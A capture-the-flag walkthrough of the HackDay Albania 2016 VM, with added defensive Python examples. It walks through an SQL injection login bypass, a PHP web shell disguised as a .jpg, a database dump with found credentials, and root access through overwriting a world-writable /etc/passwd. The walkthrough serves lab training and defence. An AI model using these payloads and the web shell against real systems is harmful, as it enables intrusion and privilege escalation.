- # Let's check our virtual machine IP:
- Currently scanning: 192.168.6.0/16 | Screen View: Unique Hosts
- 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 84
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.1.84 08:00:27:98:0d:5f 1 42 CADMUS COMPUTER SYSTEMS
- (...)
- # With that IP, let's scan it to check what's going on:
- tlopes@blackbox:~$ nmap -p 1-65535 -v -A -T5 192.168.1.84
- Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-28 00:02 WET
- NSE: Loaded 132 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Initiating Ping Scan at 00:02
- Scanning 192.168.1.84 [2 ports]
- Completed Ping Scan at 00:02, 0.00s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 00:02
- Completed Parallel DNS resolution of 1 host. at 00:02, 0.03s elapsed
- Initiating Connect Scan at 00:02
- Scanning hackday.lan (192.168.1.84) [65535 ports]
- Discovered open port 22/tcp on 192.168.1.84
- Discovered open port 8008/tcp on 192.168.1.84
- Completed Connect Scan at 00:02, 1.44s elapsed (65535 total ports)
- Initiating Service scan at 00:02
- Scanning 2 services on hackday.lan (192.168.1.84)
- Completed Service scan at 00:02, 6.02s elapsed (2 services on 1 host)
- NSE: Script scanning 192.168.1.84.
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.51s elapsed
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Nmap scan report for hackday.lan (192.168.1.84)
- Host is up (0.0060s latency).
- Not shown: 65533 closed ports
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
- |_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
- 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 26 disallowed entries (15 shown)
- | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
- | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
- | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
- |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
- |_http-server-header: Apache/2.4.18 (Ubuntu)
- |_http-title: HackDay Albania 2016
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- NSE: Script Post-scanning.
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
- tlopes@blackbox:~$
- -- we can see two services running: HTTP on port 8008 and SSH on port 22
- # Robots.txt shows a lot of disallowed entries, let's check what's there:
- tlopes@blackbox:~$ for i in `curl 192.168.1.84:8008/robots.txt | cut -d: -f2`; do echo "======"; echo "Folder: $i"; curl "192.168.1.84:8008$i"; echo ""; done;
- % Total % Received % Xferd Average Speed Time Time Time Current
- Dload Upload Total Spent Left Speed
- 100 702 100 702 0 0 307k 0 --:--:-- --:--:-- --:--:-- 685k
- ======
- Folder: /rkfpuzrahngvat/
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <title>Hmmmm????</title>
- </head>
- <body>
- <center><img src="background.jpg"></center>
- </body>
- </html>
- ======
- Folder: /slgqvasbiohwbu/
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <title>Hmmmm????</title>
- </head>
- <body>
- <center><img src="background.jpg"></center>
- </body>
- </html>
- ======
- Folder: /tmhrwbtcjpixcv/
- (...)
- ======
- Folder: /unisxcudkqjydw/
- IS there any /vulnbank/ in there ???
- ======
- # Opening "http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/" and then going to "client/login.php"
- -- it was possible to see a login form
- # Submitting the form with the variable names changed to arrays (username[] and password[]) gave the following error:
- Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
- Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
- Invalid Credentials . . .
- -- I tried with some variants but nothing special happened
- # I've executed hydra to try some user/pass combinations but without luck
- hydra 192.168.122.95 -s 8008 http-post-form "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid"
- # At the same time, I've executed sqlmap that found one blind injection ..
- -- I had no luck getting sqlmap to dump the database for me, so I did it myself:
- -- after some tries, I was able to bypass the form using the following combination:
- username: ' or 'a' = 'a' --
- password: #
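The bypass above works because the login script splices the submitted fields straight into its SQL. This added Python sketch (not the VM's PHP; the table and user are constructed) runs the same combination against a concatenated query and against a parameterised one so the difference is visible:

```python
import sqlite3

# Constructed stand-in for the VM's bank_database: one table, one known user.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return con

def login_vulnerable(con, username, password):
    """Query built by concatenation, the shape the bypass implies for login.php."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = con.execute(query).fetchone()
    return row[0] if row else None

def login_fixed(con, username, password):
    """Same lookup with bound parameters: input is compared as data, never parsed as SQL."""
    row = con.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row[0] if row else None

PAYLOAD_USER = "' or 'a' = 'a' --"   # the combination used above
PAYLOAD_PASS = "#"

if __name__ == "__main__":
    con = make_db()
    # Concatenated form: WHERE username = '' or 'a' = 'a' --' AND ...  (rest is a comment)
    print("vulnerable:", login_vulnerable(con, PAYLOAD_USER, PAYLOAD_PASS))   # alice
    print("fixed:", login_fixed(con, PAYLOAD_USER, PAYLOAD_PASS))             # None
```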
- # On the new page there's a "Contact Support" form
- -- I tried to upload a .php file but it failed (only images allowed)
- -- so I renamed the file to .jpg and it worked!
- tlopes@blackbox:~$ cat shell.jpg
- <?php
- system($_GET['cmd']);
- # Testing the PHP:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- # It worked! We have command execution on the box as www-data
- # Checking what's in the current dir
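The form checked only the extension, and view_file.php then handed the renamed file to the PHP interpreter. The following is an added example (not the VM's code) of an upload handler that validates the bytes and returns stored files as inert data; the signature table, the filename rule and the two samples are assumptions.

```python
import re

# Image signatures for the types the support form claims to accept (assumed set).
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
# Plain basename plus one image extension: no slashes, no "..", no double extensions.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)$")

def sniff_image(data):
    """Return the MIME type when the leading bytes match a known image signature, else None."""
    for magic, mime in IMAGE_SIGNATURES.items():
        if data[:len(magic)] == magic:
            return mime
    return None

def accept_upload(filename, data):
    """Decide whether an upload may be stored at all. Returns (ok, reason_or_mime)."""
    if not SAFE_NAME.match(filename):
        return False, "bad filename"
    mime = sniff_image(data)
    if mime is None:
        # A PHP file renamed to .jpg ends here: the extension passed, the bytes do not.
        return False, "content is not an image"
    if b"<?php" in data or b"<?=" in data:
        return False, "php tag inside image"
    return True, mime

def build_response(filename, data):
    """Headers for returning a stored upload as static bytes; the body is never passed to PHP."""
    ok, info = accept_upload(filename, data)
    if not ok:
        return 403, {}, b""
    headers = {"Content-Type": info,
               "X-Content-Type-Options": "nosniff",
               "Content-Disposition": 'inline; filename="%s"' % filename}
    return 200, headers, data

# Constructed samples: PHP text under an image extension, and a minimal JPEG header.
FAKE_JPG = b"<?php echo 'not an image';"
REAL_JPG = b"\xff\xd8\xff\xe0" + b"\x00" * 16

if __name__ == "__main__":
    print(accept_upload("shell.jpg", FAKE_JPG))   # (False, 'content is not an image')
    print(accept_upload("photo.jpg", REAL_JPG))   # (True, 'image/jpeg')
```

A signature check on its own is not airtight, so the part that actually closes the hole is build_response: the upload directory is served as bytes and nothing ever include()s or eval()s a stored file.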
- -- http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al
- total 52
- drwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .
- drwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..
- -rwxr-xr-x 1 taviso taviso 87 Oct 19 08:31 client.php
- -rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php
- drwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images
- -rwxr-xr-x 1 taviso taviso 403 May 23 2016 index.php
- -rwxr-xr-x 1 taviso taviso 348 Oct 20 11:58 login.php
- -rwxr-xr-x 1 taviso taviso 81 May 22 2016 logout.php
- -rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php
- drwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload
- -rwxr-xr-x 1 taviso taviso 532 Oct 19 08:29 view_file.php
- -rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php
- # Checking the config.php
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20config.php
- (...)
- $db_host = "127.0.0.1";
- $db_name = "bank_database";
- $db_user = "root";
- $db_password = "NuCiGoGo321";
- (...)
- # Dumping all databases:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=mysqldump%20-uroot%20-pNuCiGoGo321%20--all-databases
- Nothing relevant on the dump
- # ps axu, init.d, cron.d and other relevant places didn't return anything useful to attack
- # Tried to exploit mysqld with race conditions to escalate privileges, but it failed due to permissions
- # After some time searching configurations I found out that /etc/passwd was world-writable:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-alhtr%20/etc%20|%20grep%20passwd
- -rw------- 1 root root 1.6K Oct 9 13:13 passwd-
- -rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd
- # Listing all users available:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
- systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
- systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
- systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
- syslog:x:104:108::/home/syslog:/bin/false
- _apt:x:105:65534::/nonexistent:/bin/false
- lxd:x:106:65534::/var/lib/lxd/:/bin/false
- mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
- messagebus:x:108:112::/var/run/dbus:/bin/false
- uuidd:x:109:113::/run/uuidd:/bin/false
- dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
- sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
- taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
- # Let's try to change "taviso" account to a known password
- -- first simulating it on my own computer:
- tlopes@blackbox:~$ sudo adduser deleteme
- [sudo] password for tlopes:
- Adding user `deleteme' ...
- Adding new group `deleteme' (1001) ...
- Adding new user `deleteme' (1001) with group `deleteme' ...
- Creating home directory `/home/deleteme' ...
- Copying files from `/etc/skel' ...
- Enter new UNIX password:
- Retype new UNIX password:
- passwd: password updated successfully
- Changing the user information for deleteme
- Enter the new value, or press ENTER for the default
- Full Name []:
- Room Number []:
- Work Phone []:
- Home Phone []:
- Other []:
- Is the information correct? [Y/n]
- tlopes@blackbox:~$ sudo cat /etc/shadow | grep deleteme
- deleteme:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:17133:0:99999:7::
- # Let's use that hash to build the new "taviso" entry:
- taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
- # Now, let's remove taviso from /etc/passwd
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=sed%20%27/taviso/d%27%20/etc/passwd%20>%20/tmp/passwd.bk
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cp%20/tmp/passwd.bk%20/etc/passwd
- # And add our new "taviso" created in previous step:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=echo%20%27taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash%27%20%3E%3E%20/etc/passwd
- # Confirming if everything went ok:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd%20|%20grep%20taviso
- Yup, the account is there, with our password "password"
- taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
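Two checks a defender would run for the conditions this escalation relied on, added here as an example and not part of the write-up: the mode bits on /etc/passwd, and any entry whose password field carries a hash instead of deferring to /etc/shadow (it also flags extra uid 0 accounts and duplicate names, which the write-up did not use). The sample file and the placeholder hash are constructed.

```python
import stat

def check_passwd_mode(mode):
    """Report write bits on /etc/passwd beyond the owner (the VM showed -rw-r--rw-, i.e. 0o646)."""
    problems = []
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems

def audit_passwd(text):
    """Return (line_no, user, issue) tuples for suspicious entries in passwd-formatted text."""
    findings, seen = [], {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7:
            findings.append((n, f[0], "malformed entry"))
            continue
        user, pw, uid = f[0], f[1], f[2]
        if pw == "":
            findings.append((n, user, "empty password field"))
        elif pw not in ("x", "*"):
            # pam_unix uses a non-'x' field as the hash itself and never looks in /etc/shadow.
            findings.append((n, user, "hash stored in passwd instead of shadow"))
        if uid == "0" and user != "root":
            findings.append((n, user, "extra uid 0 account"))
        if user in seen:
            findings.append((n, user, "duplicate username"))
        seen.setdefault(user, n)
    return findings

# Constructed sample: a trimmed passwd file after the swap above; the hash is a placeholder.
SAMPLE = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""

if __name__ == "__main__":
    print(check_passwd_mode(0o646))   # ['world-writable']
    for finding in audit_passwd(SAMPLE):
        print(finding)                # (3, 'taviso', 'hash stored in passwd instead of shadow')
```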
- # Now let's try to connect using SSH to this account:
- tlopes@blackbox:~$ ssh taviso@192.168.1.84
- The authenticity of host '192.168.1.84 (192.168.1.84)' can't be established.
- ECDSA key fingerprint is SHA256:IWIi1cnAziEW50tRA6HT1S4Zp/bo+pjpAvJ3FddNSOE.
- Are you sure you want to continue connecting (yes/no)? yes
- Warning: Permanently added '192.168.1.84' (ECDSA) to the list of known hosts.
- taviso@192.168.1.84's password:
- Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)
- * Documentation: https://help.ubuntu.com
- * Management: https://landscape.canonical.com
- * Support: https://ubuntu.com/advantage
- 36 packages can be updated.
- 2 updates are security updates.
- *** System restart required ***
- Last login: Sat Oct 29 23:07:00 2016
- -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
- taviso@hackday:~$
- -- BAM!
- # Let's see if taviso is in the sudoers file:
- taviso@hackday:~$ sudo -i
- [sudo] password for taviso:
- -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
- root@hackday:~#
- -- BAM!
- # Let's see what root has in his home dir
- root@hackday:~# ls -al
- total 28
- drwx------ 3 root root 4096 Oct 22 17:21 .
- drwxr-xr-x 23 root root 4096 Nov 28 01:02 ..
- -rw------- 1 root root 58 Oct 22 17:21 .bash_history
- -rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
- drwxr-xr-x 2 root root 4096 Oct 9 13:18 .nano
- -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
- -rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt
- -- BAM! a flag :)
- root@hackday:~# cat flag.txt
- Urime,
- Tani nis raportin!
- d5ed38fdbf28bc4e58be142cf5a17cf5